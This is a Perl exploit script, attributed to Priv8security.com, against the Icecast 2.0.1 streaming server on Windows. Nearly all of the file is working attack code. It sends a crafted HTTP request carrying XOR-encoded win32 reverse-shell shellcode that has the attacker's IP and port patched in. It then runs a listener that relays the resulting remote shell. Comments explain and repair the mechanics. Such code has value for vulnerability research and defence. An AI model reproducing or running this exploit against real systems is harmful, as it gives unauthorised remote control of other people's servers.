#!/usr/bin/perl
################################################
# Priv8security.com remote Icecast 2.0.1 for windows exploit.
#
# Bug found by Luigi Auriemma
# Url: [url]http://aluigi.altervista.org/adv/iceexec-adv.txt[/url]
#
# This exploit gives you a reverse (connect-back) shell on a host running
# Icecast 2.0.1 on Windows, using the header-count bug from the advisory above.
# Older versions have not been tested.
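use strict;
use warnings;
use IO::Socket;    # also re-exports Socket's inet_aton / SOCK_STREAM
use Getopt::Std;

# Assigned inside Listenshell() below without a `my`; declaring them at file
# scope keeps that sub compiling under strict.
my ($listen_pid, $pid, $line);

# Options:
#   -h  victim host/IP (required)
#   -i  IP the shell connects back to (required; patched into the shellcode)
#   -l  local port to listen on for the connect-back (default 6969)
#   -p  Icecast HTTP port to attack (default 8000)
my %args;
getopts('h:i:l:p:', \%args);
my $host     = $args{'h'};
my $yourip   = $args{'i'};
my $yourport = defined $args{'l'} ? $args{'l'} : 6969;
my $port     = defined $args{'p'} ? $args{'p'} : 8000;

print STDERR "-=[Priv8security.com Icecast 2.0.1 remote exploit]=-\n\n";
if (!defined($host) || !defined($yourip)) {
    print STDERR "Options:
-h Victim ip.
-i Ip to connect back.
-l Port to connect back.
-p Port to attack.\n\n";
    print STDERR "Usage: perl $0 -h Victim -i YOURIP\n\n";
    exit;
}

# Offsets into the raw (un-encoded) shellcode of the sockaddr_in fields the
# reverse shell connects to: 154 = 4-byte IP (placeholder 0xc0a800f7),
# 161 = 2-byte port (placeholder 0x2211). Both are network byte order.
my $off_host = 154;
my $off_port = 161;

# pack("n") is big-endian on every host; reverse(pack("S", ...)) only yielded
# network order on little-endian machines.
my $port_bin = pack("n", $yourport);
# inet_aton accepts a dotted quad or a hostname and returns undef on failure;
# the original gethostbyname() call was never checked, so a typo would have
# spliced garbage into the shellcode.
my $host_bin = inet_aton($yourip)
    or die "Cant resolve connect-back address '$yourip'\n";

my $shellcoder = # win32 reverse by hdm[at]metasploit.com
    "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" .
    "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" .
    "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" .
    "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" .
    "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" .
    "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" .
    "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" .
    "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" .
    "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" .
    "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68\xc0\xa8\x00\xf7\x68\x02" .
    "\x00\x22\x11\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44" .
    "\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe" .
    "\x44\x24\x3d\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d" .
    "\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00" .
    "\x51\xff\x55\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24" .
    "\x57\xff\x55\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b" .
    "\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" .
    "\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0" .
    "\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b" .
    "\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" .
    "\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

# Patch the connect-back port and IP into the sockaddr_in placeholders.
substr($shellcoder, $off_port, 2, $port_bin);
substr($shellcoder, $off_host, 4, $host_bin);

# XOR-encode the shellcode so it carries no NULs into the HTTP request.
# Caveat: a raw 0x99, 0x93 or 0x94 byte encodes to 0x00, 0x0a or 0x0d, which
# would end the header line early. The fixed shellcode contains none of them,
# but a connect-back IP/port that does will likely break the request.
my $xor = 0x99;
my $scxored = join '', map { chr(ord($_) ^ $xor) } split //, $shellcoder;

# Loop counter for the decoder: `xor ecx,ecx; sub cx,(0xffff-len)` leaves
# cx = len+1, so the stub also XORs the single byte after the payload (the CR
# of the trailing CRLF). Harmless, and kept as in the original.
# pack("v") is little-endian (what the x86 immediate needs) on every host;
# pack("S") was native order.
my $len = pack("v", 0xffff - length($scxored));

my $decoder = #decoder from Metasploit.com by hdm[at]metasploit.com
    "\xd9\xe1" .          # fabs
    "\xd9\x34\x24" .      # fnstenv (%esp,1)
    "\x5b" .              # pop %ebx
    "\x5b" .              # pop %ebx
    "\x5b" .              # pop %ebx
    "\x5b" .              # pop %ebx  -> ebx = address of the fabs above
    "\x80\xeb\xe7" .      # sub $0xe7,%bl  (== add 25: skip the 25-byte stub)
    #
    # short_xor_beg:
    #
    "\x31\xc9" .          # xor %ecx,%ecx
    "\x66\x81\xe9$len" .  # sub $len,%cx
    #
    # short_xor_xor:
    #
    "\x80\x33\x99" .      # xorb $0x99,(%ebx)
    "\x43" .              # inc %ebx
    "\xe2\xfa";           # loop short_xor_xor

# Payload header line: "\xeb\x04" is `jmp short +4`, hopping over the 4-byte
# "AA: " so the line is both a syntactically valid header and runnable code;
# then a NOP slide, the decoder and the encoded shell.
my $buffer = "\xeb\x04" . "AA: " . "\x90" x 10 . $decoder . $scxored . "\r\n";
my $crap   = "AAAA: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

# 30 filler headers followed by the payload header. Why that header count
# makes Icecast 2.0.1 execute the payload is explained in the advisory linked
# in the file header, not here.
my $pacote = "GET / HTTP/1.0\r\nHost: Priv8security.com\r\n";
$pacote .= $crap x 30 . $buffer . "\r\n";

my $sock = IO::Socket::INET->new(Proto => "tcp", PeerHost => $host, PeerPort => $port)
    or die "Cant connect: $!\n";

# Listenshell() forks: the parent stays in its accept loop waiting for the
# shell, the child returns here and delivers the request.
Listenshell($yourport);
print STDERR "[+] Sending our stuff... ";
$sock->send($pacote);
print STDERR "DOne!\n";
print STDERR "[+] Now wait for connectback shell...\n";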
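# Listenshell($lport)
#
# Binds a TCP listener on $lport and forks. The parent never returns on the
# normal path: it accepts connect-back shells forever and, per connection,
# forks a relay (parent: socket -> STDOUT, child: STDIN -> socket). The child
# of the first fork returns immediately so the caller can fire the exploit.
#
# Caveat: no LocalAddr is given, so the socket listens on all interfaces —
# anything that can reach $lport gets wired to this terminal.
sub Listenshell {
    my ($lport) = @_;

    my $lsock = IO::Socket::INET->new(
        Proto     => "tcp",
        LocalPort => $lport,
        Type      => SOCK_STREAM,
        Listen    => 3,
        ReuseAddr => 1,
    ) or die "[-] Error starting listener: $!\n";
    print "[+] Listener started on port $lport\n";

    my $listen_pid = fork();
    die "cant fork: $!" unless defined $listen_pid;
    return unless $listen_pid;    # child: back to the caller, which sends the payload

    while (my $cback = $lsock->accept()) {
        print STDOUT "[+] Starting Shell " . $cback->peerhost . ":" . $cback->peerport . "\n\n";
        print $cback "\n";

        my $pid = fork();
        die "cant fork: $!" unless defined $pid;
        if ($pid) {
            # remote -> our terminal, until the shell closes the socket
            while (defined(my $line = <$cback>)) {
                print STDOUT $line;
            }
            kill("TERM", $pid);
            # Reap the relay child; the original never waited, leaving one
            # zombie per shell session.
            waitpid($pid, 0);
        }
        else {
            # our terminal -> remote
            while (defined(my $line = <STDIN>)) {
                print $cback $line;
            }
            # The original fell through into the accept() loop here on STDIN
            # EOF, leaving two processes competing for connections. The relay
            # child has nothing more to do.
            exit 0;
        }
    }
    return;
}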